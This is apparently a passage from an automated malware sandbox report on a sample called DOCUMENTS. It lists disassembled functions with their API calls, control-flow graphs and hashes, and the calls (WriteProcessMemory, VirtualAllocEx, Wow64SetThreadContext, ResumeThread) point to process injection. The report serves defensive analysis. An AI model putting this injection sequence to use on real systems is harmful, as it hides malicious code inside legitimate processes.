                                                control_flow_graph 225 70deff0-70df046 227 70df048-70df054 225->227 228 70df056-70df095 WriteProcessMemory 225->228 227->228 230 70df09e-70df0ce 228->230 231 70df097-70df09d 228->231 231->230
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 070DF088
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: ebb3ad1be653b8204d23e829df195f6313077c2c8d682fac5f5e8a9d523022fe
                                                • Instruction ID: 35ff3d1c75b0ad4055d0fe009ca2db270c0d0a49d49cdd8faa3a1b56939eaaa1
                                                • Opcode Fuzzy Hash: ebb3ad1be653b8204d23e829df195f6313077c2c8d682fac5f5e8a9d523022fe
                                                • Instruction Fuzzy Hash: A12168B190030A9FDB10DFA9C8817DEBBF1FF48310F14882AE959A7241D7789941CF60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 070DEFF8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 235 70deff8-70df046 237 70df048-70df054 235->237 238 70df056-70df095 WriteProcessMemory 235->238 237->238 240 70df09e-70df0ce 238->240 241 70df097-70df09d 238->241 241->240
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 070DF088
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 7c2b5cc0b295c1c1fc3f409601be713cb94590761e62189833ffb3cc8dca7919
                                                • Instruction ID: d88f65c5c96101b4c15367d58842f06641b9fa8904e62506ddeae1ad80156506
                                                • Opcode Fuzzy Hash: 7c2b5cc0b295c1c1fc3f409601be713cb94590761e62189833ffb3cc8dca7919
                                                • Instruction Fuzzy Hash: 982127B19003599FDB10DFAAC881BDEBBF5FF48310F108929E919A7240D779A941CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 070DEE58 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 245 70dee58-70deeab 247 70deead-70deeb9 245->247 248 70deebb-70deeeb Wow64SetThreadContext 245->248 247->248 250 70deeed-70deef3 248->250 251 70deef4-70def24 248->251 250->251
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 070DEEDE
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 0b53fc6b634976279b3fe412f10501a6a05d15fa0239f13042a6a036d72de845
                                                • Instruction ID: 1cecec9b8b0f1be7f5db4736e7293b1efe434d4ea3fd61d66ef8a78fc33da763
                                                • Opcode Fuzzy Hash: 0b53fc6b634976279b3fe412f10501a6a05d15fa0239f13042a6a036d72de845
                                                • Instruction Fuzzy Hash: 202138B1D003198FDB60CFAAC4857EEBBF4EF48324F14892AD459A7240CB799945CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 070DF0E0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 255 70df0e0-70df175 ReadProcessMemory 258 70df17e-70df1ae 255->258 259 70df177-70df17d 255->259 259->258
                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 070DF168
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: dfa172ebc1b17db23784875fce1d38fa078d24750b3de46c7a2ec0a52e59256d
                                                • Instruction ID: c08ab0129638b128210d4f0c9ae619350d6f87a1e8921025e2f5ae143eb91e6f
                                                • Opcode Fuzzy Hash: dfa172ebc1b17db23784875fce1d38fa078d24750b3de46c7a2ec0a52e59256d
                                                • Instruction Fuzzy Hash: AA2107B5D003599FDB10DFA9C981BEEBBF5FF48310F10882AE559A7240D7389945CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 070DF0E8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 273 70df0e8-70df175 ReadProcessMemory 276 70df17e-70df1ae 273->276 277 70df177-70df17d 273->277 277->276
                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 070DF168
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 45eebc4ba14977d43bd79e1c3ec6fae712069db4dad232c2178ff2313cb1faad
                                                • Instruction ID: 0b262399643627ced79f109ac38326c5a882c811370964be82708b29cfbc7ec7
                                                • Opcode Fuzzy Hash: 45eebc4ba14977d43bd79e1c3ec6fae712069db4dad232c2178ff2313cb1faad
                                                • Instruction Fuzzy Hash: BB21E6B5D003599FDB10DFAAC881BDEBBF5FF48320F108929E519A7240D779A945CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 070DEE60 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 263 70dee60-70deeab 265 70deead-70deeb9 263->265 266 70deebb-70deeeb Wow64SetThreadContext 263->266 265->266 268 70deeed-70deef3 266->268 269 70deef4-70def24 266->269 268->269
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 070DEEDE
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 112c02e866b0b1d38eaaaaad197917a8fea4c5cbc943f7a60f3f13e45b1adece
                                                • Instruction ID: 3d0be229418524f762c6bf6b7261d404aa4922e56cf6a58d12a61c64fbace29a
                                                • Opcode Fuzzy Hash: 112c02e866b0b1d38eaaaaad197917a8fea4c5cbc943f7a60f3f13e45b1adece
                                                • Instruction Fuzzy Hash: 852129B1D003198FDB10DFAAC4857EEBBF5EF48324F148529D419A7240DB78A945CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 011BD5C0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 281 11bd5c0-11bd654 DuplicateHandle 282 11bd65d-11bd67a 281->282 283 11bd656-11bd65c 281->283 283->282
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 011BD647
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1356142048.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_11b0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 6ba77dd72e71a8defe6169c6ed13546de732b251dd7cbacc422759eb7ee4714f
                                                • Instruction ID: a86cc334bbdac2c3b863427e1adf4d99fa84deebd21cb4f933df5fa9afc18815
                                                • Opcode Fuzzy Hash: 6ba77dd72e71a8defe6169c6ed13546de732b251dd7cbacc422759eb7ee4714f
                                                • Instruction Fuzzy Hash: E921C4B59002489FDB10CF9AD984ADEFBF5EB48314F14841AE918A3350D378A944CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 070DEF30 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 286 70def30-70defb3 VirtualAllocEx 289 70defbc-70defe1 286->289 290 70defb5-70defbb 286->290 290->289
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 070DEFA6
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 1faf161845ee6343d523e23ac8a8b772bacd5155256674700604e156ef565de9
                                                • Instruction ID: 84ce4e3caabce2bf3e69896afe7623da606e2d1bb70b2268ad1dc65771853c5e
                                                • Opcode Fuzzy Hash: 1faf161845ee6343d523e23ac8a8b772bacd5155256674700604e156ef565de9
                                                • Instruction Fuzzy Hash: 911159758003499FDB20DFA9C844BDEFBF5EF48320F248819E559A7250C7799941CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 011BA0A8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 294 11ba0a8-11bb1a0 296 11bb1a8-11bb1d7 LoadLibraryExW 294->296 297 11bb1a2-11bb1a5 294->297 298 11bb1d9-11bb1df 296->298 299 11bb1e0-11bb1fd 296->299 297->296 298->299
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,011BAFB9,00000800,00000000,00000000), ref: 011BB1CA
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1356142048.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_11b0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 596c52114acd6f9f7ea2c6c747a4868859a9e81701c640af0d3a6dc45dc7f57c
                                                • Instruction ID: 013eaea57e5f4130c37f8e2ffb3bfb1384c54f0ff81ebf98a84979f4f5654630
                                                • Opcode Fuzzy Hash: 596c52114acd6f9f7ea2c6c747a4868859a9e81701c640af0d3a6dc45dc7f57c
                                                • Instruction Fuzzy Hash: B311F9B5D043499FDB14CF9AD884BDEFBF4EB48310F10841AE519A7600C775A545CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 011BB159 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,011BAFB9,00000800,00000000,00000000), ref: 011BB1CA
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1356142048.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_11b0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 0574f302373efe3bc771adb7c709fe2a38d0a41c34d7a61bb3d6518da88f61f5
                                                • Instruction ID: 9516f0b3fc2a9f3ffea8a85897fef622a173b9c42eaef314e969183fa85ef61f
                                                • Opcode Fuzzy Hash: 0574f302373efe3bc771adb7c709fe2a38d0a41c34d7a61bb3d6518da88f61f5
                                                • Instruction Fuzzy Hash: 9B1114B68002498FDB14CFAAD884BDEFBF4EB88310F10842AD919A7610C379A545CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 070DEF38 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 070DEFA6
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 6bbdc9171ba3c7deb192a38cf188d5b09f35a2fea1f71aa52b398bdec8807dad
                                                • Instruction ID: 16fcc87e384c824a140cb9c7223d99df3729a306a6734b1f2ca221b4675de5d3
                                                • Opcode Fuzzy Hash: 6bbdc9171ba3c7deb192a38cf188d5b09f35a2fea1f71aa52b398bdec8807dad
                                                • Instruction Fuzzy Hash: C211F6759003499FDB20DFAAC845BDFBBF5EF88320F148819E519A7250CB79A941CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 070DE970 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 6d2716eab817d0961a8857e4cf5ad8c6621bd01cb7fb661b2e5ab926575bef2f
                                                • Instruction ID: 6accefc36ad80c0e2711ac309b1e78c41103479b4fd9bec59054eb0342b79f8b
                                                • Opcode Fuzzy Hash: 6d2716eab817d0961a8857e4cf5ad8c6621bd01cb7fb661b2e5ab926575bef2f
                                                • Instruction Fuzzy Hash: D51158B5D003598FDB20DFAAC4457EEFBF5EF48220F24891AD459A7240CB39A945CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 011BAED1 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 011BAF3E
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1356142048.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_11b0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 4ced76f9d2989e797b7c7df128eb70ef595e17862bf3c918f0eaa22804fddf8a
                                                • Instruction ID: 3356cc9b85b09b950c158385f43b1010e23c6b587063a7052d1ffe11ee4e05c4
                                                • Opcode Fuzzy Hash: 4ced76f9d2989e797b7c7df128eb70ef595e17862bf3c918f0eaa22804fddf8a
                                                • Instruction Fuzzy Hash: C51146B1C002498FDB24CFAAD485BDEFBF1EF88314F14845AD459A7240C379A546CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 070DE978 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 89d91c6affa3983aac3e1d2418737c76a3bc9e6e9bda2d546794959b1a577b29
                                                • Instruction ID: 70a937136efbefbb3f2f86875b3fba92b31ea65df2811b3cc996579d8b36c460
                                                • Opcode Fuzzy Hash: 89d91c6affa3983aac3e1d2418737c76a3bc9e6e9bda2d546794959b1a577b29
                                                • Instruction Fuzzy Hash: F61128B1D003598FDB20DFAAC4457DEFBF5EF88220F248819D419A7240CA79A941CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 011BAED8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 011BAF3E
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1356142048.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_11b0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 6f54ecea5a0bfb3f678d025542841766077a389d831ab7a3b388a67be24e5f7d
                                                • Instruction ID: 4fec16e40df20988919ea264800da14e7f4143efa5d2c284d60e9952aca0e64c
                                                • Opcode Fuzzy Hash: 6f54ecea5a0bfb3f678d025542841766077a389d831ab7a3b388a67be24e5f7d
                                                • Instruction Fuzzy Hash: 9A110FB6C002498FDB24CF9AD484ADEFBF4EF88224F10841AD928A7240C379A545CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071B3E58 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 071B3EB5
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362943300.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_71b0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 4da6b0eda941f3bc82631fc1bf67f957b42b77f0173e2838c699532d30a57d41
                                                • Instruction ID: 727ae33cc687fa546a35da3b8409478901840ca77cb4151d2f52b520035c2c41
                                                • Opcode Fuzzy Hash: 4da6b0eda941f3bc82631fc1bf67f957b42b77f0173e2838c699532d30a57d41
                                                • Instruction Fuzzy Hash: 0E11E5B58003499FDB20DF9AC985BDEFBF8EB48320F10881AD518B7640D379A944CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071B3E53 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 071B3EB5
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362943300.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_71b0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 5424430a82105d1b81689c347842e01333ca8f26c6c52bc71de2b4c23e54146b
                                                • Instruction ID: da837e099abc2353395630f0c83112108bfb15e2151550a276739e0aea3601c3
                                                • Opcode Fuzzy Hash: 5424430a82105d1b81689c347842e01333ca8f26c6c52bc71de2b4c23e54146b
                                                • Instruction Fuzzy Hash: 8611C2B58003499FDB20DF99D985BDEBBF4EB48310F10881AD958B7640D379A594CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00DAD3D8 Relevance: .1, Instructions: 75COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1355070606.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_dad000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4d278bb856a6cf22ff210725df06c3c7979eb39b46377c982486a9181fa8b582
                                                • Instruction ID: 11e2cfe11b8b4cc944ff4a5c0de5f505a1dfc3d82c3e35f6cafd03fa9cc7ae5b
                                                • Opcode Fuzzy Hash: 4d278bb856a6cf22ff210725df06c3c7979eb39b46377c982486a9181fa8b582
                                                • Instruction Fuzzy Hash: 00210371500304DFDB05DF10D9C0B16BB66FB99324F24C569E80A0B656C37AE856DAB2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00DAD4C4 Relevance: .1, Instructions: 75COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1355070606.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_dad000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dfdad58e56a3f95b8248b76602c3c86c654503cb8d812df735f21542bdcd7ce7
                                                • Instruction ID: 167fe9626e07605510ad220624429c1910525ca7c8457f4f1b7b2992d2fd2cef
                                                • Opcode Fuzzy Hash: dfdad58e56a3f95b8248b76602c3c86c654503cb8d812df735f21542bdcd7ce7
                                                • Instruction Fuzzy Hash: AA212572904240DFDB15DF10D9C0F26BF66FB8A318F24C569E84A0B656C336D856DBB2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00DBD01C Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1355151055.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_dbd000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3dc5cc232ebbe7a2afb1e56b40ff1a3580ac9508ab32af354587dcb0bbee490f
                                                • Instruction ID: e7fe755c8cb6d67c6a442d0502227ba041cde1b41117a0cb1e9cdfdd756de48f
                                                • Opcode Fuzzy Hash: 3dc5cc232ebbe7a2afb1e56b40ff1a3580ac9508ab32af354587dcb0bbee490f
                                                • Instruction Fuzzy Hash: F8212271604300DFDB14EF10D8C0B56BB62EB88314F24C5A9E84A0B282D33AD847CA72
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00DBD1D4 Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1355151055.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_dbd000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c82b61ea3adb457679925e6dfadef9366147799a49189f3b70a7692c0f18c8cd
                                                • Instruction ID: c26966075d9acf852ce28386a24a29151cf26ac9c7c61098e32c172fe1ef988f
                                                • Opcode Fuzzy Hash: c82b61ea3adb457679925e6dfadef9366147799a49189f3b70a7692c0f18c8cd
                                                • Instruction Fuzzy Hash: F621F271504384EFDB05DF10D9C0B66BBA6FB88314F24C5ADE84A4B292E33AD846CB75
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00DBD005 Relevance: .1, Instructions: 62COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1355151055.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_dbd000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 498b43a76fbc670a81b55669505d3b4f19f9e75056ad993cb0726f9a3436c389
                                                • Instruction ID: def203e4d2190e97144ff8375106e19c8c5f07ec69779dda7d51939d65d43739
                                                • Opcode Fuzzy Hash: 498b43a76fbc670a81b55669505d3b4f19f9e75056ad993cb0726f9a3436c389
                                                • Instruction Fuzzy Hash: 7C218E75509380CFCB06DF20D990715BF72EB46314F28C5EAD8498B2A7C33A980ACB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00DAD3D3 Relevance: .1, Instructions: 56COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1355070606.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_dad000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1166f709330a6c50fb0ccab333658baa4cf0de4601631cd9e1789cef95a599a7
                                                • Instruction ID: 656cdf870b07bd275c6663ee573eaa112bc3be084676c256a2a62afffb15ec70
                                                • Opcode Fuzzy Hash: 1166f709330a6c50fb0ccab333658baa4cf0de4601631cd9e1789cef95a599a7
                                                • Instruction Fuzzy Hash: 6B112676404240CFCB05CF00D5C4B16BF72FB99324F28C6A9D80A0B656C33AE856CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00DAD4BF Relevance: .1, Instructions: 56COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1355070606.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_dad000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1166f709330a6c50fb0ccab333658baa4cf0de4601631cd9e1789cef95a599a7
                                                • Instruction ID: adf8df3b3521feb36c2e83a1a26531a0f3a64fc9ed5a4add7d47d3bde14ceefe
                                                • Opcode Fuzzy Hash: 1166f709330a6c50fb0ccab333658baa4cf0de4601631cd9e1789cef95a599a7
                                                • Instruction Fuzzy Hash: 6311E676904280CFCB15CF10D5C4B1ABF72FB99314F28C6A9D84A0B656C336D856DBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00DBD1CF Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1355151055.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_dbd000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5930c3722e95abe2067eb95ddfb8aa1848112c8b53b048d5b6b565b5491e75cf
                                                • Instruction ID: 095c964384086106f3364afef665d479f995f91217112514d2bd3aa86629f875
                                                • Opcode Fuzzy Hash: 5930c3722e95abe2067eb95ddfb8aa1848112c8b53b048d5b6b565b5491e75cf
                                                • Instruction Fuzzy Hash: BD118B75504280DFCB15DF10D5C4B55BFA2FB84314F28C6A9D84A4B696D33AD84ACB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00DAD745 Relevance: .0, Instructions: 45COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1355070606.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_dad000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 014d84a6cfc2cad134f6b776bee3f8791f25ecdf497155a7e0d8348b24cc07ac
                                                • Instruction ID: c72cf25c45716ad3fe3e85b827096c692b2e270973f1bce07bb47fea2844f6d5
                                                • Opcode Fuzzy Hash: 014d84a6cfc2cad134f6b776bee3f8791f25ecdf497155a7e0d8348b24cc07ac
                                                • Instruction Fuzzy Hash: 46012B310043409EE7248F15CC84B66FBA9DF42364F18C91AED1B0BA82D379DC41CAB5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00DAD744 Relevance: .0, Instructions: 36COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1355070606.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_dad000_DOCUMENTS.jbxd
                                                Similarity
